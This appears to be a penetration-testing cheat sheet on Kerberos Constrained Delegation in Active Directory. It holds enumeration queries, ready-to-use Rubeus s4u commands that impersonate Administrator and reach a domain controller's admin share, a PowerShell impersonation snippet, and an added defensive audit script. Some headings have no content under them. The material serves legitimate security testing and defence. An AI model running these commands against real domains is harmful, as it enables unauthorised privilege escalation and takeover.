Kerberos Delegation - Constrained Delegation
Kerberos Constrained Delegation (KCD) is an Active Directory (AD) feature that lets a service obtain Kerberos tickets on behalf of a user (or another service) to a fixed list of target services, named in its msDS-AllowedToDelegateTo attribute, so it can access those resources as that user.
Identify a Constrained Delegation
- BloodHound:
MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p
- PowerView:
Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft
- Native
- bloodyAD:
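A defender-side audit of the same attribute, as an added example that is not part of the original page: it lists every account with msDS-AllowedToDelegateTo set and flags those that also allow protocol transition (the TRUSTED_TO_AUTH_FOR_DELEGATION flag in userAccountControl, 0x1000000), the condition under which S4U2self works without the impersonated user ever contacting the service. It assumes the RSAT ActiveDirectory module is installed and that the caller can read the domain.

```powershell
# Added audit example (not from the original page). Assumes the RSAT
# ActiveDirectory module and read access to the domain.
Import-Module ActiveDirectory

# userAccountControl bit for TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition).
# When set, the service can request S4U2self tickets for arbitrary users.
$TrustedToAuthForDelegation = 0x1000000

# Every user or computer object that has constrained delegation configured.
$delegating = Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
    -Properties msDS-AllowedToDelegateTo, userAccountControl, servicePrincipalName

$report = foreach ($obj in $delegating) {
    $uac = [int]$obj.userAccountControl

    # Distinct hosts named in the target SPNs. The service class in a ticket
    # is not protected, so any host listed here is effectively reachable for
    # every service it runs (compare /altservice in the Rubeus examples).
    $targetHosts = $obj.'msDS-AllowedToDelegateTo' |
        ForEach-Object { (($_ -split '/')[1] -split ':')[0] } |
        Where-Object { $_ } |
        Sort-Object -Unique

    [pscustomobject]@{
        Account            = $obj.Name
        Class              = $obj.ObjectClass
        ProtocolTransition = [bool]($uac -band $TrustedToAuthForDelegation)
        TargetHosts        = ($targetHosts -join ', ')
        TargetSPNs         = ($obj.'msDS-AllowedToDelegateTo' -join '; ')
    }
}

# Protocol-transition entries first: these deserve the closest review, since
# they do not depend on a real user authenticating to the delegating service.
$report | Sort-Object -Property ProtocolTransition -Descending | Format-Table -AutoSize
```

Any account in the output whose TargetHosts include a domain controller or other tier-0 host should be treated as equivalent to an administrator of that host; review whether it needs delegation at all and whether protocol transition can be turned off.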
Exploit the Constrained Delegation
- Impacket
- Rubeus: S4U2 attack (S4U2self + S4U2proxy)
# with a password
Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password"
# with a NT hash
Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt
Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
dir \\dc.domain.com\c$
- Rubeus: use an existing ticket to perform an S4U2 attack to impersonate the "Administrator"
- Rubeus: using AES256 keys
Impersonate a domain user on a resource
Requires: SYSTEM-level privileges on a machine configured with constrained delegation
PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
PS> $idToImpersonate.Impersonate()
PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
PS> ls \\dc01.offense.local\c$